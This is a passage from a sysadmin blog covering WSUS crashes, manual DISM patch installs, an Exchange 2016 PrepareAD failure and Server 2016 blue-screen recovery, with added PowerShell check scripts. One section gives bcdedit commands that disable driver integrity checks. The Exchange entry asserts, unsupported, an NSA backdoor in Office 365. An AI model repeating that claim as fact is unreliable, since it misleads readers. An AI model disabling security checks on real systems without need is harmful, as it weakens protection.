Self-update is not working.
The Reporting Web Service is not working.
The API Remoting Web Service is not working.
Event ID 10016, SYSTEM, DistributedCOM

Solution:
- Give the host on ESX/Hypervisor more memory. You could trace for hours to find out how much, or you can be smart and give it 16-20 GB RAM. It depends on the history of the WSUS (like running for 5 years, number of clients or patches, how you clean up the WSUS with tools or scripts via SQL query).
- Open IIS, Application Pools, WSUSPOOL, Advanced Settings, and change the "Private Memory Limit (KB)" to something under the ESX memory you gave it. (In our example the IIS app process runs at around 14 GB RAM and we gave the server 18 GB.)
- Reboot and all works again



You can now see how much memory the IIS app pool is consuming on a larger WSUS with a lot of history over the years (lots of WID/SQL data…)



by butsch
28. July 2022 17:06
Event ID 7053,12072,12052,12042,12012,13042 on WSUS Server
ERROR:
Unable to open WSUS MMC or connect with Script/PS/Tools to the WSUS database. On Clients or Server your see an error when this happens because the WSUS APP Pool on IIS is down.
Whats the problem?
If this happens you will after a reboot of the server loose most of the APPROVAL or DENY on your WSUS backwards for years.
Solution:
Mostly 90% related to RAM memory the WSUS has and the Application POOL WSUS itself or you run out of space on your WSUS content drive.
Prelude:
In the past months all long time running WSUS Server no matter on which OS they run seem to crash more often then they did before. We first long time watched and thought this was related sporadic too:
- Multi usage of MMC Console (Several users checking WSUS)
- Space on D: drive (With all the Feature Update you are up to 1 Terra soon)
- Script which we had running to maintain WSUS or best Clean up WSUS automatic after it crashed again (Deny 12'000 Patches…)
- We also assumed it is caused by a mix of WID (Windows Intern DB/Different Version of SQL Express or STD > we updated some mixed used WSUS + EPO 5.10 to sql 2017)
- As always maybe AV Solutions which pinpoint. But we use Mcafee ENS Endpoint with many Exceptions and it never blocked SQL or WID when configured right and not by beginners
All of that seemed not the source of the problem.
It looks like the crashed are more often to memory handling of IIS Application Pools and total memory the HOST (VM) has.
Here are the errors we did see:
Event ID 7053, Application | The WSUS administration console has encountered an unexpected error. This may be a transient error; try restarting the administration console. If this error persists,
Try removing the persisted preferences for the console by deleting the wsus file under %appdata%\Microsoft\MMC\.
System.NullReferenceException -- Object reference not set to an instance of an object.
Source: Microsoft.UpdateServices.UI.SnapIn
Stack Trace: at Microsoft.UpdateServices.UI.SnapIn.Scope.ServerSummaryScopeNode.ResetScopeNode()
|
Event ID 12072/12052/12042/12012/13042, Application, Windows Server Update Services | The Server Synchronization Web Service is not working. | The WSUS content directory is not accessible.
System.Net.WebException: The remote server returned an error: (503) Server Unavailable.
at System.Net.HttpWebRequest.GetResponse()
at Microsoft.UpdateServices.Internal.HealthMonitoring.HmtWebServices.CheckContentDirWebAccess(EventLoggingType type, HealthEventLogger logger) | 
| The DSS-Authentication Web Service is not working. | Self-update is not working. | The Reporting Web Service is not working. | The API Remoting Web Service is not working. |
Event ID 10016, SYSTEM, DistributedCOM | 
|
Solution:
- Give the host on ESX/the hypervisor more memory. You could trace for hours to find out how much, or be smart and give it 16-20 GB RAM. It depends on the history of the WSUS (like running for 5 years, the number of clients or patches, how you clean up WSUS with tools or scripts via SQL query).
- Open IIS > Application Pools > WSUSPool > Advanced Settings and change "Private Memory Limit (KB)" to something below the memory you gave the ESX VM. (In our example the IIS app process runs at around 14 GB RAM and we gave the server 18 GB.)
- Reboot, and all works again.
You can now see how much memory the IIS app pool is consuming on a larger WSUS with a lot of history over the years (lots of WID/SQL data...).
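An added check for this situation (example code, not from the original post): it reads the pool's private memory limit from IIS, the VM's physical RAM and the current working set of the pool's w3wp.exe, and flags a limit that is unset or above the RAM the VM actually has. It assumes the default pool name WsusPool and the WebAdministration module on the WSUS server.

```powershell
# Added example, not part of the original post. Assumes WSUS runs on this host,
# the application pool is named 'WsusPool' (the default) and the
# WebAdministration module is available (Server 2012 R2 / 2016 / 2019).
Import-Module WebAdministration

function Get-WsusPoolMemoryStatus {
    param([string]$PoolName = 'WsusPool')

    # "Private Memory Limit (KB)" from IIS > Application Pools > Advanced Settings; 0 = no limit
    $limitKB = [int64](Get-ItemProperty "IIS:\AppPools\$PoolName" `
        -Name recycling.periodicRestart.privateMemory).Value
    $ramMB = [math]::Round((Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory / 1MB)

    # w3wp.exe carries the pool name on its command line: -ap "WsusPool"
    $w3wp = Get-CimInstance Win32_Process -Filter "Name = 'w3wp.exe'" |
        Where-Object { $_.CommandLine -like "*-ap `"$PoolName`"*" }
    $wsMB = [math]::Round((($w3wp | Measure-Object WorkingSetSize -Sum).Sum) / 1MB)

    $limitMB = [math]::Round($limitKB / 1KB)
    $verdict = if ($limitKB -eq 0) { 'no limit: the pool can grow until the VM swaps' }
               elseif ($limitMB -ge $ramMB) { 'limit is above physical RAM: lower it below the VM memory' }
               else { 'limit is below physical RAM: OK' }

    [pscustomobject]@{
        Pool              = $PoolName
        PrivateMemLimitMB = $limitMB
        HostRamMB         = $ramMB
        W3wpWorkingSetMB  = $wsMB
        Verdict           = $verdict
    }
}

# Set the limit (for example 2 GB below the VM's RAM) and recycle the pool so it takes effect
function Set-WsusPoolMemoryLimit {
    param([string]$PoolName = 'WsusPool', [int64]$LimitMB)
    Set-ItemProperty "IIS:\AppPools\$PoolName" -Name recycling.periodicRestart.privateMemory -Value ($LimitMB * 1KB)
    Restart-WebAppPool -Name $PoolName
}

Get-WsusPoolMemoryStatus | Format-List
```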
Tags:
WSUS | Hotfixes / Updates
by butsch
16. November 2021 14:11
WSUS, W10/11: how to install a WSUS update (KB patch) manually with DISM from the WSUSContent source directory
This blog entry is about two things.
- How to install a Windows update from the WSUS source content folder manually by hand with DISM
- McAfee ENS 10.X, IPS Exploit Rule 6133 may block tiworker.exe with some updates (MITRE T1562)
Here is how to get the info which file belongs to which KB from the WSUS server:
Search for the file in your WSUSContent folder.
Un-7-Zip the CAB file.
For most monthly patch day packages you also often need the SSU (Servicing Stack Update). In most patches this is included, so you have several CAB files as seen above. Install the SSU first.
Servicing Stack Updates (SSU): Frequently Asked Questions (microsoft.com)
1. Install the SSU:
dism /Online /Add-Package /PackagePath:"c:\drivers\SSU-19041.1220-x64.cab.cab"
2. Install the patch itself:
dism /Online /Add-Package /PackagePath:"c:\drivers\Windows10.0-KB5005565-x64.cab"
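The same two-step install as a script (added example, not from the original post): it asks DISM what each CAB contains, installs the SSU before the cumulative update, skips packages that are already installed or not applicable, and reports whether a reboot is needed. The file paths are assumed and should be replaced with the CABs you extracted from WSUSContent.

```powershell
# Added example, not part of the original post. Installs CAB files extracted
# from the WSUS content folder in the right order (SSU first, then the LCU)
# and records what DISM actually did. Paths below are assumptions.
$packages = @(
    'C:\drivers\SSU-19041.1220-x64.cab',          # Servicing Stack Update first
    'C:\drivers\Windows10.0-KB5005565-x64.cab'    # then the cumulative update
)

function Install-WsusCabSet {
    param([string[]]$Paths)
    foreach ($cab in $Paths) {
        if (-not (Test-Path $cab)) { throw "Package file not found: $cab" }
        $file = Split-Path $cab -Leaf

        # Ask DISM what the CAB contains and whether it fits this image before touching anything
        $info = Get-WindowsPackage -Online -PackagePath $cab
        if ($info.PackageState -eq 'Installed') {
            [pscustomobject]@{ File = $file; Package = $info.PackageName; Action = 'already installed'; Reboot = $false }
            continue
        }
        if (-not $info.Applicable) {
            [pscustomobject]@{ File = $file; Package = $info.PackageName; Action = 'not applicable to this image'; Reboot = $false }
            continue
        }

        # Same as "dism /Online /Add-Package /PackagePath:..."; keep a per-package DISM log
        $r = Add-WindowsPackage -Online -PackagePath $cab -NoRestart -LogPath "$env:TEMP\dism-$file.log"
        [pscustomobject]@{ File = $file; Package = $info.PackageName; Action = 'installed'; Reboot = $r.RestartNeeded }
    }
}

$done = Install-WsusCabSet -Paths $packages
$done | Format-Table -AutoSize
if ($done.Reboot -contains $true) { Write-Host 'Reboot required to finish the update.' }
```

If ENS IPS rule 6133 fires during the Add-WindowsPackage step, the per-package log in %TEMP% shows at which package the install stopped.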
Keep an eye on complex antivirus with IPS modules that do more than pattern scanning.
We have seen some Exploit IPS rules from McAfee ENS 10.X which are on by default and should stay on to protect against ransomware. It is good to keep an eye on those rules. Please carefully read the FULL alert in your ENS. Most of the time it says "WOULD BLOCK" if the ePO admin activated some rules in monitor mode (to test new rules).
Exploit Rule 6133, change on the ePO side in the ENS policy
by butsch
16. November 2021 13:58
Unable to import a KB emergency (Notfall)/interim/post-Patchday Microsoft patch into a WSUS server running under Microsoft Server 2012 R2.
Problem: You are unable to import patches from the Windows Update Catalog on 2012 R2 WSUS.
Problem: You don't see the "import directly into WSUS" button on 2019 (Edge/IE mix).
Most people discover this while in a hurry to deploy the following 14.11.2021 emergency patches, released after the November 2021 updates, which take apart their Azure, load balancer, ADFS, WAF-IIS etc.
- Windows Server 2019: KB5008602
- Windows Server 2016: KB5008601
- Windows Server 2012 R2: KB5008603
- Windows Server 2012: KB5008604
- Windows Server 2008 R2 SP1: KB5008605
- Windows Server 2008 SP2: KB5008606
https://docs.microsoft.com/en-us/windows/release-health/status-windows-10-1607-and-windows-server-2016#2748msgdesc
Microsoft has released out-of-band updates to address authentication failures related to Kerberos delegation scenarios impacting Domain Controllers (DC) running supported versions of Windows Server. On impacted systems, end-users cannot sign into services or applications using Single Sign-On (SSO) in Active Directory on-premises or hybrid Azure Active Directory environments.
On the WSUS server, if you try to import a patch from the Windows Update Catalog it fails.
Error (FEHLER) you see:
"Es konnten nicht alle Updates importiert werden. Wenn Sie den Vorgang abgebrochen haben, starten Sie den Import der Updates erneut. Ist ein Fehler aufgetreten, klicken Sie in der Statusspalte neben dem jeweiligen Update auf Fehler, um die Lösung für das Problem anzuzeigen."
Here is the process to import a KB file into your WSUS.
*********** STEP NEEDED if you run WSUS on Server 2019 ONLY ************** FROM HERE
If you are unable to see the ADD/Hinzufügen button on Server 2019, do the following. Start iexplore.exe manually from the start menu.
Open the site:
https://catalog.update.microsoft.com/
Install the plugin (it only appears in Internet Explorer 11, not Edge) on Server 2019.
You can also check the add-on in the IE add-ons:
Open "Import from Windows Catalog".
The site will open in Edge > copy the full URL, open iexplore.exe (IE11) again and paste the full URL there.
Now in IE you see the import button:
Still, you can ONLY import the 2019 patches on a WSUS running on Server 2019 ;-) Very nice. Do we need to roll out full SCCM now for every SBS/KMU?
*********** STEP NEEDED if you run WSUS on Server 2019 ************** TO HERE / END STEP 2019 ONLY
Error: the "Importergebnisse" (import results) dialog shows the message quoted above.
Solution:
Add the following registry value and reboot the server.
Command line (one line):
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319 /V SchUseStrongCrypto /T REG_DWORD /D 1
Single registry value:
Value name: SchUseStrongCrypto
Value data: 1
Type: DWORD (32-bit) Value
Reboot.
Retry.
OK.
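An added check for this fix (example code, not from the original post): it reports whether SchUseStrongCrypto is set for .NET 4.x and, with -Apply, sets it. It also covers the Wow6432Node key, which the post does not set; 32-bit .NET processes read that key, so it is included here as my own addition. A reboot is still needed afterwards, as the post says.

```powershell
# Added example, not part of the original post. Reports / sets the .NET 4.x
# strong-crypto switch (TLS 1.2 for SslStream/WebRequest) under both the
# 64-bit and the 32-bit (Wow6432Node) .NET keys. Reboot after applying.
function Test-DotNetStrongCrypto {
    param([switch]$Apply)

    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\.NETFramework\v4.0.30319',
        'HKLM:\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319'
    )
    foreach ($key in $keys) {
        if (-not (Test-Path $key)) {
            [pscustomobject]@{ Key = $key; SchUseStrongCrypto = 'key missing'; Changed = $false }
            continue
        }
        $current = (Get-ItemProperty -Path $key -Name SchUseStrongCrypto -ErrorAction SilentlyContinue).SchUseStrongCrypto
        $changed = $false
        if ($Apply -and $current -ne 1) {
            # Same effect as the "reg add ... /T REG_DWORD /D 1" line in the post
            New-ItemProperty -Path $key -Name SchUseStrongCrypto -PropertyType DWord -Value 1 -Force | Out-Null
            $current = 1
            $changed = $true
        }
        [pscustomobject]@{
            Key                = $key
            SchUseStrongCrypto = if ($null -eq $current) { 'not set' } else { $current }
            Changed            = $changed
        }
    }
}

# What this PowerShell process itself negotiates right now; the registry value
# only shows up here in processes started after the change (and after the reboot)
function Get-CurrentSecurityProtocol {
    [Net.ServicePointManager]::SecurityProtocol.ToString()
}

Test-DotNetStrongCrypto | Format-Table -AutoSize
"Effective protocols in this process: $(Get-CurrentSecurityProtocol)"
```

Run `Test-DotNetStrongCrypto -Apply` from an elevated shell to set both keys, then reboot and retry the import.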
Tags:
WSUS | Hotfixes / Updates
by butsch
19. April 2021 15:57
ISO/PATCH: ExchangeServer2016-x64-cu20
Cumulative Update 20 for Exchange Server 2016 (microsoft.com)
Problem:
Exchange 2016 CU20 Setup.exe /PrepareAD (version 15.1.2242.4) fails on Server 2016 (1607).
The step "Configuring Microsoft Exchange Server Organization Preparation" results in FAILED.
Exchange 2016 CU20 needs to update the Active Directory schema to a newer version and fails (setup.exe /PrepareSchema works, setup.exe /PrepareAD fails) if you have renamed the Outlook Web App policy Default/default/DEFAULT.
We had a case in a parent/child domain setup where we had to update the Active Directory of the company's parent domain from the command line to a new schema version. This was related to the second Exchange 2016 breach/hotfix and we wanted to uplift Exchange 2016 from CU19 to CU20 urgently.
PrepareSchema worked, but the second command, PrepareAD, failed.
Schema Versions
ERROR you see during setup.exe /PrepareAD
Error from PowerShell:
The following error was generated when "$error.Clear();
$policyDefault = Get-OwaMailboxPolicy -DomainController $RoleDomainController | where {$_.Identity -eq "Default"};
if($policyDefault -eq $null)
{
New-OwaMailboxPolicy -Name "Default" -DomainController $RoleDomainController
}
" was run:
"Microsoft.Exchange.Data.Directory.ADObjectAlreadyExistsException: Active Directory operation failed on NOVCHVOLDCW1.novartis.com. The object 'CN=Default,CN=OWA Mailbox Policies,CN=migros,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=migros,DC=net' already exists. ---> System.DirectoryServices.Protocols.DirectoryOperationException: The object exists.
at System.DirectoryServices.Protocols.LdapConnection.ConstructResponse(Int32 messageId, LdapOperation operation, ResultAll resultType, TimeSpan
Source of problem:
You can see which OWA app policy you have with the following:
Get-OwaMailboxPolicy -DomainController Butschdcw1 | Fl Identity
Notice the case sensitivity of the IDENTITY "Default/default/DEFAULT".
Error full:
Workaround:
Change the identity name of the Outlook Web App policy back to Default:
- Go into the Exchange 2016 GUI (Exchange Admin Center)
- Permissions / Berechtigungen
- Outlook Web App policies / Outlook Web App-Richtlinien
- Mark the "Default/default/DEFAULT" entry and click the PENCIL/EDIT
- Change the name to Default (capital D, the rest lowercase)
- On the command line, replicate the DCs with repadmin.exe /syncall
After that you can run setup.exe /PrepareAD and update the schema for the Exchange 2016 CU.
Check the schema after replication with repadmin.exe /syncall:
CHECK OBJECTVERSION:
$RootDSE= ([ADSI]"").distinguishedName
([ADSI]"LDAP://cn=swiss,cn=Microsoft Exchange,cn=Services,cn=Configuration,$RootDSE").objectVersion
CHECK RANGEUPPER:
$RootDSE= ([ADSI]"").distinguishedName
([ADSI]"LDAP://CN=ms-Exch-Schema-Version-Pt,CN=Schema,CN=Configuration,$RootDSE").rangeUpper
objectVersion: 16220
rangeUpper: 15333
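An added pre-flight check for this problem (example code, not the post's or Microsoft's), to run in the Exchange Management Shell before setup.exe /PrepareAD. The first function lists every OWA mailbox policy and shows whether its name equals "Default" only case-insensitively (-eq, the operator the setup snippet above uses) or exactly (-ceq); the second reads rangeUpper and the organization's objectVersion via rootDSE, which also works from a child domain and reads the organization name from AD instead of hard-coding it. The domain controller name is a parameter you supply.

```powershell
# Added example, not part of the original post. Requires the Exchange
# Management Shell (Get-OwaMailboxPolicy) and AD read access.
function Find-OwaPolicyNameCaseClash {
    param([string]$DomainController, [string]$Expected = 'Default')

    foreach ($p in (Get-OwaMailboxPolicy -DomainController $DomainController)) {
        $name = $p.Name
        [pscustomobject]@{
            Name                   = $name
            MatchesCaseInsensitive = ($name -eq $Expected)   # what setup's "where" filter sees
            MatchesExact           = ($name -ceq $Expected)  # what the AD object name must be
            # "default"/"DEFAULT" satisfy -eq but not -ceq: this is the policy to rename
            NeedsRename            = ($name -eq $Expected) -and -not ($name -ceq $Expected)
        }
    }
}

function Get-ExchangeAdVersions {
    # configurationNamingContext is forest-wide, so no hard-coded DC=...,DC=... is needed
    $config    = ([ADSI]'LDAP://RootDSE').configurationNamingContext.Value
    $schemaObj = [ADSI]"LDAP://CN=ms-Exch-Schema-Version-Pt,CN=Schema,$config"

    # The organization container (CN=swiss in the post) is the msExchOrganizationContainer
    # child of CN=Microsoft Exchange,CN=Services
    $services = [ADSI]"LDAP://CN=Microsoft Exchange,CN=Services,$config"
    $org = $services.Children |
        Where-Object { $_.SchemaClassName -eq 'msExchOrganizationContainer' } |
        Select-Object -First 1

    [pscustomobject]@{
        RangeUpper          = [int]$schemaObj.rangeUpper.Value      # schema version (/PrepareSchema)
        OrganizationName    = [string]$org.cn.Value
        ConfigObjectVersion = [int]$org.objectVersion.Value        # org config version (/PrepareAD)
    }
}

Find-OwaPolicyNameCaseClash -DomainController 'Butschdcw1' | Format-Table -AutoSize
Get-ExchangeAdVersions
```

Any row with NeedsRename = True is the policy to rename to "Default" in the EAC before /PrepareAD, as the workaround above describes.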
Some further reading why this could have happened
https://devblogs.microsoft.com/scripting/weekend-scripter-unexpected-case-sensitivity-in-powershell/
https://superuser.com/questions/720037/powershell-if-statement-case-insensitive
Final note on this issue:
We have seen several other such related issues with Exchange 2016/2019. Something does not update or install simply because something is case sensitive, or some argument is missing or is there where it should not be. Mainly at customers with a long history, who were on Exchange for over 15 years across several versions.
We know how to fix it but always ask "And then? Next update, does it run the same? Does it run?" And sometimes Tier 3 from Microsoft does nothing else. They compare what's different between the customer and their reference, then change the attribute with ADSIEDIT and close the case. That's it, no explanation.
Still, the above gives me a bad feeling. The patch was released ASAP and it was the second patch. If they had tested the patch to death, someone else would have come again and asked why they kept the patch back so long. (For IT: it was because they had to discuss so long with the NSA on how to turn things back.)
If you read the story about the FBI, who could change your Exchange settings by court order, you know what happened if you are not a naive IT-world geek. Cloud Office 365 was not affected because their NSA backdoor works in another way (read more on Google or search MSDN TechNet
by butsch
24. March 2021 21:41
Hello,
This is a collection of some technical things we used to recover a SRV 2016 with blue screens. We assume the first crash was related to a too early SRV 2016 VL release ISO and ESX 6.5 (from 2018), in combination with a Windows Defender update.
This may help you to recover a Server 2016 in general. It's so rare with 2012 R2/2016 that this may help, because it's not a daily thing, and people tend to go back to a snapshot or restore from Veeam these days. Still, we have seen this happen.
SRV 2016, Windows patch, BSOD, STOP CODE 0xc000021a or CRITICAL SERVICE FAILED, rollback, blue screen how-to
Windows patch, BSOD, STOP CODE 0xc000021a, rollback, blue screen how-to (notice the PAGE FILE partition where the memory DUMP was written)
BSOD, blue screen on Server 2016
STOP CODE 0xc000021a
STOP CODE CRITICAL SERVICE FAILED

Server 2016 problems with the 02/2021 patches: KB4601318 fails to update, fails at 24% on Windows Server 2016 - Microsoft Q&A
The customer ran the following VMware setup for the cluster (because they wanted to test the newer release for some days):
VMware ESX versions:
- 6.5 build 9298722: ESXi 6.5 U2C, patch ESXi650-201808001, released 8/14/2018
- 6.5 build 13635690: ESXi 6.5 EP 14, patch ESXi650-201905001, released 05/14/2019
Build numbers and versions of VMware ESXi/ESX (2143832)

Rollback of the updates that caused the blue screen, if you installed Windows updates before the crash:

- Choose the blue recovery console
- Choose Troubleshoot
- Choose cmd.exe
- Change the KEYBOARD layout so you type the local admin password correctly
- Log on with the local admin password
- Roll back the last updates with: dism /image:D:\ /cleanup-image /revertpendingactions (D: is the drive where your Windows Server install is, thus where c:\program files and c:\windows are; search for that partition from C: to Z:)

Step by step:

Enter the password (hopefully).

Change the KEYBOARD layout so you type the local admin password correctly.
Log on with the local admin password.
Search for the Windows partition.
Check with:
sfc /scannow

Run chkdsk if you think there is damage to the file system or disk:
chkdsk G: /f /r /x

Check the pending operations it should have done or had done during the crash:

Remove C:\windows\winsxs\pending.xml:
cd g:\windows\winsxs\
rename pending.xml pending.old

Roll back the last updates with:
dism /image:D:\ /cleanup-image /revertpendingactions
D: is the drive where your Windows Server install is, thus where c:\program files and c:\windows are (search for that partition from C: to Z:).

Error: 0x800f082f
BAD: (looks even worse now...)

GOOD: (looks good until you try to reinstall the same patch in a week...)

wpeutil reboot

OR
type: EXIT

OR NOT
If you have "CRITICAL SERVICE FAILED" this could be related to an UNSIGNED DRIVER, or something is wrong with certificates (CODE SIGNING). Maybe ask the firewall team if they block CERTIFICATE REVOCATION checks, and if they don't know what you are talking about, check yourself. Read more on the blog.
Try these BOOT options with F8:

If the server comes up with "Disable Driver Signature Enforcement" and you don't need that (because it's not a high-security server), you could disable it permanently. We do not recommend this on an Exchange server, for example, or on anything security related.
If it comes up, run:
sfc /scannow
Manually disable certificate signature validation:
Open cmd.exe as an administrator and run:
bcdedit -set loadoptions DDISABLE_INTEGRITY_CHECKS
Re-enable the certificate validation:
Open cmd.exe as an administrator and run:
bcdedit -set loadoptions DENABLE_INTEGRITY_CHECKS
FAQ: How to remove failed packages in Windows PE



Looking at why the server crashed with the NirSoft tool BlueScreenView

Microsoft recommends the PAGE FILE partition to be RAM + some XXX MB. This is what happens IF the server ever has a blue screen, so don't do it that way.
I am unsure whether the server would have picked the partition if no more space had been there (like they recommend). Never liked that recommendation.
The page file size should exceed the size of physical RAM in the system (SharePoint Server) - SharePoint Server | Microsoft Docs
Cause: A Windows best practice is to set the page file size to a value greater than or equal to the total amount of available physical memory. For automatic heap recovery, garbage collection generally works more effectively when the size of the managed heap approaches the page file size. If the page file size is smaller than the RAM size, new managed memory allocations are granted, which makes garbage collection more expensive and increases CPU usage.
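An added post-recovery check for the points this post touches (example code, not from the original post), to run on the recovered Server 2016 once it boots: it reports a leftover pending.xml, whether driver signature enforcement was left disabled via bcdedit, and whether the page file on each volume is at least RAM-sized so a future memory dump fits. Run it from an elevated PowerShell.

```powershell
# Added example, not part of the original post. Read-only checks on a booted
# Server 2016 after the recovery steps above. Requires an elevated shell.
function Get-PendingServicingState {
    $pending = Join-Path $env:windir 'winsxs\pending.xml'
    [pscustomobject]@{ PendingXmlPresent = (Test-Path $pending); Path = $pending }
}

function Get-IntegrityCheckState {
    # bcdedit prints "loadoptions  DDISABLE_INTEGRITY_CHECKS" and "testsigning  Yes" when set
    $lines = bcdedit /enum '{current}'
    $load  = $lines | Select-String '^\s*loadoptions\s+(.+)$' |
             ForEach-Object { $_.Matches[0].Groups[1].Value.Trim() }
    $test  = $lines | Select-String '^\s*testsigning\s+(\S+)' |
             ForEach-Object { $_.Matches[0].Groups[1].Value }
    [pscustomobject]@{
        LoadOptions             = $load
        TestSigning             = $test
        # True means the temporary workaround from the post was never reverted
        SignatureEnforcementOff = ($load -match 'DISABLE_INTEGRITY_CHECKS') -or ($test -eq 'Yes')
    }
}

function Get-CrashDumpReadiness {
    $ramMB = [math]::Round((Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory / 1MB)
    $cc    = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl'
    # AllocatedBaseSize is in MB; a complete dump needs a page file of at least RAM size
    $pageFiles = Get-CimInstance Win32_PageFileUsage | ForEach-Object {
        [pscustomobject]@{
            PageFile    = $_.Name
            AllocatedMB = $_.AllocatedBaseSize
            CoversRam   = ($_.AllocatedBaseSize -ge $ramMB)
        }
    }
    [pscustomobject]@{
        RamMB            = $ramMB
        CrashDumpEnabled = $cc.CrashDumpEnabled   # 0 none, 1 complete, 2 kernel, 3 small, 7 automatic
        DumpFile         = $cc.DumpFile
        PageFiles        = $pageFiles
    }
}

Get-PendingServicingState
Get-IntegrityCheckState
Get-CrashDumpReadiness | Format-List
```

SignatureEnforcementOff = True on a production server means the bcdedit DENABLE_INTEGRITY_CHECKS step above still has to be done.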
